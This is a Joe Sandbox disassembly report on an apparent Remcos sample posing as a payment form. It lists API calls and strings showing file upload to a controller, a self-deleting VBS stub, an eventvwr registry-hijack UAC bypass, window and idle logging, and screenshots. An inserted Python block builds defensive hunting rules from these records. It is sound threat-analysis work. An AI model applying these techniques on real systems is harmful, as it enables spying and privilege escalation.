                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                              • String ID: Close
                                              • API String ID: 1657328048-3535843008
                                              • Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                              • Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
                                              • Opcode Fuzzy Hash: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                              • Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$Info
                                              • String ID:
                                              • API String ID: 2509303402-0
                                              • Opcode ID: fdea39b954b1f5acf66d6067823d5c965f1ccd743e2f457f67106af727a2ce82
                                              • Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
                                              • Opcode Fuzzy Hash: fdea39b954b1f5acf66d6067823d5c965f1ccd743e2f457f67106af727a2ce82
                                              • Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
                                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
                                              • __aulldiv.LIBCMT ref: 00407D89
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
                                              • CloseHandle.KERNEL32(00000000), ref: 00407FA0
                                              • CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
                                              • CloseHandle.KERNEL32(00000000), ref: 00408038
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                              • API String ID: 3086580692-2596673759
                                              • Opcode ID: 3628a73cbb86b5736265ac293d311146e85fdcb2316ed178213f0337e0fbe7ae
                                              • Instruction ID: 8e1224200a6c450cfdafa1dd663dcbd78fa1a86951e699dbe30fbedc525f5c9c
                                              • Opcode Fuzzy Hash: 3628a73cbb86b5736265ac293d311146e85fdcb2316ed178213f0337e0fbe7ae
                                              • Instruction Fuzzy Hash: 05B191316083409BC354FB65C891AAFB7E9AFD4314F40492FF489622D2EF789D458B8B
                                              APIs
                                                • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                                                • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                                                • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                                • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                                • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
                                              • ExitProcess.KERNEL32 ref: 0040C57D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                              • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
                                              • API String ID: 1913171305-2600661426
                                              • Opcode ID: 70891b21b58788eddca9bde0dcaf417eeb0d7ecfe2aad7753274a26e0c41b8a2
                                              • Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
                                              • Opcode Fuzzy Hash: 70891b21b58788eddca9bde0dcaf417eeb0d7ecfe2aad7753274a26e0c41b8a2
                                              • Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99
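Three of the records above describe behaviour that is visible in ordinary process-creation telemetry: the routine that runs a copy of itself with `/stext "` (the save-to-text switch of the NirSoft recovery tools), then sleeps and DeleteFileW's the output; the Toolhelp32 process walk that looks for ieinstal.exe and ielowutil.exe under the Internet Explorer directory before injection; and the uninstall/update routine that writes a .vbs into Temp containing `CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)` and launches it via ShellExecuteW. The Python below is an added example, not Joe Sandbox output and not Remcos code: it turns those three records into hunting rules and runs them over constructed Sysmon-style events. The event schema, the sample events, and the assumption that iexplore.exe is the only normal parent of the IE helper binaries are all hypothetical and should be tuned against your own baseline (the `/stext` rule in particular will also fire on an administrator running NirSoft tools by hand).

```python
"""Process-creation hunting rules derived from the Remcos function records
on this page. Added example: not Joe Sandbox output and not Remcos code."""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation event (Sysmon EID 1 / 4688 shape). Hypothetical schema."""
    image: str          # full path of the new process
    cmdline: str        # its command line
    parent_image: str   # full path of the parent


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
IE_HELPERS = {"ieinstal.exe", "ielowutil.exe"}      # names taken from the record's strings
EXPECTED_IE_PARENTS = {"iexplore.exe"}              # assumption: the normal launcher of both helpers
ARG_RE = re.compile(r'"([^"]*)"|(\S+)')             # one quoted or one bare argument


def split_args(cmdline: str) -> list[str]:
    """Split a Windows command line into arguments, honouring double quotes."""
    return [quoted or bare for quoted, bare in ARG_RE.findall(cmdline)]


def in_temp(path: str) -> bool:
    """True for anything under a directory named Temp (AppData\\Local\\Temp, Windows\\Temp)."""
    return "\\temp\\" in path.lower()


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def rule_vbs_from_temp(ev: ProcEvent) -> bool:
    """wscript/cscript executing a .vbs that lives under Temp: the shape of the
    self-deleting stub ('.vbs', 'Temp', 'DeleteFile(Wscript.ScriptFullName)')."""
    if image_name(ev.image) not in SCRIPT_HOSTS:
        return False
    return any(a.lower().endswith(".vbs") and in_temp(a) for a in split_args(ev.cmdline)[1:])


def rule_ie_helper_odd_parent(ev: ProcEvent) -> bool:
    """ieinstal.exe / ielowutil.exe started by something other than Internet Explorer:
    these are the injection targets the process walk searches for."""
    return image_name(ev.image) in IE_HELPERS and image_name(ev.parent_image) not in EXPECTED_IE_PARENTS


def rule_stext_dump(ev: ProcEvent) -> bool:
    """Any process passing /stext, the NirSoft save-as-text switch seen in the record."""
    return "/stext" in (a.lower() for a in split_args(ev.cmdline))


RULES = {
    "vbs_from_temp": rule_vbs_from_temp,
    "ie_helper_odd_parent": rule_ie_helper_odd_parent,
    "stext_dump": rule_stext_dump,
}


def hunt(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires on every event."""
    return [(i, rname) for i, ev in enumerate(events) for rname, fn in RULES.items() if fn(ev)]


# Constructed sample events (hypothetical paths and user name; not from the report).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\victim\AppData\Local\Temp\install.vbs"',
              r"C:\Users\victim\AppData\Local\Temp\sample.exe"),
    ProcEvent(r"C:\Program Files (x86)\Internet Explorer\ielowutil.exe",
              r'"C:\Program Files (x86)\Internet Explorer\ielowutil.exe"',
              r"C:\Users\victim\AppData\Local\Temp\sample.exe"),
    ProcEvent(r"C:\Program Files (x86)\Internet Explorer\ielowutil.exe",   # benign: launched by IE
              r'"C:\Program Files (x86)\Internet Explorer\ielowutil.exe"',
              r"C:\Program Files (x86)\Internet Explorer\iexplore.exe"),
    ProcEvent(r"C:\Users\victim\AppData\Local\Temp\sample.exe",
              r'"C:\Users\victim\AppData\Local\Temp\sample.exe" /stext "C:\Users\victim\AppData\Local\Temp\out.txt"',
              r"C:\Users\victim\AppData\Local\Temp\sample.exe"),
    ProcEvent(r"C:\Windows\System32\wscript.exe",                           # benign: logon script
              r'"C:\Windows\System32\wscript.exe" "\\dc01\netlogon\logon.vbs"',
              r"C:\Windows\System32\userinit.exe"),
]

if __name__ == "__main__":
    for idx, rule in hunt(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{rule}] {image_name(ev.image)} <- {image_name(ev.parent_image)} :: {ev.cmdline}")
```

On the constructed events the script flags the .vbs stub, the ielowutil.exe launch with a non-IE parent, and the `/stext` invocation, while leaving the IE-spawned helper and the netlogon script alone. In production the `in_temp` check and the parent allow-list are the two knobs to widen or tighten.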
                                              APIs
                                              • connect.WS2_32(?,?,?), ref: 004048C0
                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
                                              • WSAGetLastError.WS2_32 ref: 00404A01
                                                • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                              • API String ID: 994465650-2151626615
                                              • Opcode ID: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
                                              • Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
                                              • Opcode Fuzzy Hash: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
                                              • Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                                              • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                                              • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                                              • closesocket.WS2_32(?), ref: 00404E3A
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E71
                                              • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E82
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E89
                                              • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9A
                                              • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9F
                                              • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EA4
                                              • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB1
                                              • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB6
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                              • String ID:
                                              • API String ID: 3658366068-0
                                              • Opcode ID: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                                              • Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
                                              • Opcode Fuzzy Hash: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                                              • Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58
                                              APIs
                                                • Part of subcall function 00452A89: CreateFileW.KERNEL32(?,00000008,00000007,d.E,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
                                              • __dosmaperr.LIBCMT ref: 00452ED6
                                              • GetFileType.KERNEL32(00000000), ref: 00452EE2
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
                                              • __dosmaperr.LIBCMT ref: 00452EF5
                                              • CloseHandle.KERNEL32(00000000), ref: 00452F15
                                              • CloseHandle.KERNEL32(00000000), ref: 0045305F
                                              • GetLastError.KERNEL32 ref: 00453091
                                              • __dosmaperr.LIBCMT ref: 00453098
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                              • String ID: H
                                              • API String ID: 4237864984-2852464175
                                              • Opcode ID: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                                              • Instruction ID: def4621c7e831d5678052e1043e56ea9e2bfce8be848437acb5cac56d61a7e39
                                              • Opcode Fuzzy Hash: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                                              • Instruction Fuzzy Hash: CAA15832A101049FDF19EF68D8417AE7BB1AB0A325F14015FFC419B392DB798D1ACB5A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 65535$udp
                                              • API String ID: 0-1267037602
                                              • Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                              • Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
                                              • Opcode Fuzzy Hash: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                              • Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 00409C81
                                              • Sleep.KERNEL32(000001F4), ref: 00409C8C
                                              • GetForegroundWindow.USER32 ref: 00409C92
                                              • GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
                                              • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
                                              • Sleep.KERNEL32(000003E8), ref: 00409D9D
                                                • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                              • String ID: [${ User has been idle for $ minutes }$]
                                              • API String ID: 911427763-3954389425
                                              • Opcode ID: a44f1e588b244d76f3851291f59a3d8a0f12b55ab3dd92a15c41ef104020a1a6
                                              • Instruction ID: 7a62ae1493acfbf190be1d0992f15f5c774c3bdccfea44e4f2dca48363f02a21
                                              • Opcode Fuzzy Hash: a44f1e588b244d76f3851291f59a3d8a0f12b55ab3dd92a15c41ef104020a1a6
                                              • Instruction Fuzzy Hash: 7C5193716043405BD304FB61D855A6EB795AF84308F50093FF486A62E3DF7CAE45C69A
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
                                              • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
                                              • __dosmaperr.LIBCMT ref: 00438646
                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
                                              • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
                                              • __dosmaperr.LIBCMT ref: 00438683
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
                                              • __dosmaperr.LIBCMT ref: 004386D7
                                              • _free.LIBCMT ref: 004386E3
                                              • _free.LIBCMT ref: 004386EA
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                              • String ID:
                                              • API String ID: 2441525078-0
                                              • Opcode ID: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
                                              • Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
                                              • Opcode Fuzzy Hash: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
                                              • Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID: pF$tF
                                              • API String ID: 269201875-2954683558
                                              • Opcode ID: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
                                              • Instruction ID: 6443803da38cddfc03973e112e1470be20db66c409a4168417c9ccfa39c85508
                                              • Opcode Fuzzy Hash: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
                                              • Instruction Fuzzy Hash: 1261D5B5D00205AFEB20CF69C841BAABBF4EF05B14F15416BE944EB381E7749D41DB58
                                              APIs
                                              • SetEvent.KERNEL32(?,?), ref: 0040549F
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
                                              • TranslateMessage.USER32(?), ref: 0040555E
                                              • DispatchMessageA.USER32(?), ref: 00405569
                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
                                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                              • String ID: CloseChat$DisplayMessage$GetMessage
                                              • API String ID: 2956720200-749203953
                                              • Opcode ID: ccb2b5939507dcdda0a1a967b1ed40d2d91f690434090c2768fefac03c20ff07
                                              • Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
                                              • Opcode Fuzzy Hash: ccb2b5939507dcdda0a1a967b1ed40d2d91f690434090c2768fefac03c20ff07
                                              • Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A
                                              APIs
                                                • Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
                                              • CloseHandle.KERNEL32(00000000), ref: 00416123
                                              • DeleteFileA.KERNEL32(00000000), ref: 00416132
                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                              • String ID: <$@$@%G$@%G$Temp
                                              • API String ID: 1704390241-4139030828
                                              • Opcode ID: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                                              • Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
                                              • Opcode Fuzzy Hash: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                                              • Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99
                                              APIs
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
                                              • ExitProcess.KERNEL32 ref: 00406782
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExecuteExitProcessShell
                                              • String ID: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe$H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                              • API String ID: 1124553745-2767765711
                                              • Opcode ID: 6b1a5510a4db5a3f1f15a42aa6e338bfc8bc2b9e59eaf597c176b63f52c6dbb5
                                              • Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
                                              • Opcode Fuzzy Hash: 6b1a5510a4db5a3f1f15a42aa6e338bfc8bc2b9e59eaf597c176b63f52c6dbb5
                                              • Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
                                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-0
                                              • Opcode ID: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                                              • Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
                                              • Opcode Fuzzy Hash: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                                              • Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5
                                              APIs
                                              • _free.LIBCMT ref: 00445645
                                                • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                              • _free.LIBCMT ref: 00445651
                                              • _free.LIBCMT ref: 0044565C
                                              • _free.LIBCMT ref: 00445667
                                              • _free.LIBCMT ref: 00445672
                                              • _free.LIBCMT ref: 0044567D
                                              • _free.LIBCMT ref: 00445688
                                              • _free.LIBCMT ref: 00445693
                                              • _free.LIBCMT ref: 0044569E
                                              • _free.LIBCMT ref: 004456AC
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                              • Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
                                              • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                              • Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00417F6F
                                              • GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
                                              • Sleep.KERNEL32(000003E8), ref: 004180B3
                                              • GetLocalTime.KERNEL32(?), ref: 004180BB
                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                              • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                              • API String ID: 489098229-3790400642
                                              • Opcode ID: 1831d568b42309de5b58f9f9912d811ee0f6a6e0929818137c97fc0b58266688
                                              • Instruction ID: ff50de85f816598f14f139fcbfe24147e98e2bb745fd097185ef2e944e73ca26
                                              • Opcode Fuzzy Hash: 1831d568b42309de5b58f9f9912d811ee0f6a6e0929818137c97fc0b58266688
                                              • Instruction Fuzzy Hash: 98516071A001549BCB04BBB5C8529FD76A8AF55308F04403FF805A71E2EF7C5E85C799
                                              APIs
                                              • Sleep.KERNEL32(00001388), ref: 00409738
